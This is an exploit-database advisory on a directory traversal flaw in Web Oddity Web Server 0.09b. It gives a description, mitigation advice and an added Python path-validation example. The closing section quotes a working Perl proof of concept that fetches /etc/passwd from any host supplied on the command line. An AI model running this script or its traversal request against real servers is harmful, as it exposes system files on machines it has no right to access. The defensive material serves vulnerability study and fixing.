Vendor: Web Server
By: Katatafish
CVSS: 5.5 (MEDIUM)
Directory Transversal
CWE: 22
Product Name: Web Server
Affected Version From: 0.09b
Affected Version To: 0.09b
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Web Oddity Web Server 0.09b Directory Transversal Vulnerability

This exploit allows an attacker to perform directory traversal and read the contents of sensitive files on the target system. By requesting a path built from repeated `../` segments (the proof of concept below requests /etc/passwd this way), the attacker can step out of the intended file path and access files outside of the web server's root directory.

Mitigation:

The vulnerability can be mitigated by implementing proper input validation and sanitization techniques. The web server should also enforce strict file access permissions to prevent unauthorized access to sensitive files.
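
One way to implement the input validation described above, as an added example that is not part of the original advisory or of the Web Oddity code: the request path is decoded once, canonicalized, and served only if it still lies under the document root. It assumes a POSIX filesystem; `resolve_request_path`, `run_samples` and the `htdocs` layout are hypothetical names, and the sample requests are constructed.

```python
import os
import tempfile
from urllib.parse import unquote


def resolve_request_path(doc_root, request_target):
    """Map a request target to a real path inside doc_root, or return None
    when it would escape the root (the server should then refuse it)."""
    path = request_target.partition("?")[0]      # drop the query string
    decoded = unquote(path)                      # decode %xx exactly once
    if "\x00" in decoded:                        # NUL would truncate in C-level APIs
        return None
    root = os.path.realpath(doc_root)
    # realpath collapses ".." segments and follows symlinks before the check
    candidate = os.path.realpath(os.path.join(root, decoded.lstrip("/")))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


def run_samples():
    """Check constructed requests against a throwaway document root."""
    samples = [
        "/index.html",
        "/img/../index.html",                    # ".." that stays inside the root
        "/../../../../../../../etc/passwd",      # request shape used by the PoC
        "/%2e%2e/%2e%2e/etc/passwd",             # same idea, percent-encoded
        "/link/passwd",                          # symlink pointing outside the root
    ]
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        root = os.path.join(tmp, "htdocs")
        os.makedirs(os.path.join(root, "img"))
        open(os.path.join(root, "index.html"), "w").close()
        os.symlink("/etc", os.path.join(root, "link"))
        real_root = os.path.realpath(root)
        for target in samples:
            resolved = resolve_request_path(root, target)
            results[target] = (None if resolved is None
                               else os.path.relpath(resolved, real_root))
    return results


if __name__ == "__main__":
    for target, served in run_samples().items():
        print(f"{target!r:45} -> {served or 'REJECTED'}")
```

The check runs on the canonical path rather than on the raw string, so filtering out `../` by pattern is not needed and encoded or symlinked variants are caught by the same comparison.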
Source

Exploit-DB raw data:

# Web Oddity Web Server 0.09b Directory Transversal Vulnerability
# Found by: Katatafish (karatatata@hush.com)
# Download: http://sourceforge.net/project/showfiles.php?group_id=13854
# Thanks: str0ke

use LWP::Simple;
use strict;

sub usage
{
       print "----------------------------------------------------- - -----------\n";
       print "Web Oddity Web Server 0.09b Directory Transversal Vulnerability\n";
       print "\n";
       print "usage: $0 www.site.com\n";
       print "------------------------------------------------- Katatafish-----\n";
       exit ();
}

my $host=shift || &usage;
getprint 'http://' . $host . '/../../../../../../../etc/passwd';

# milw0rm.com [2007-09-04]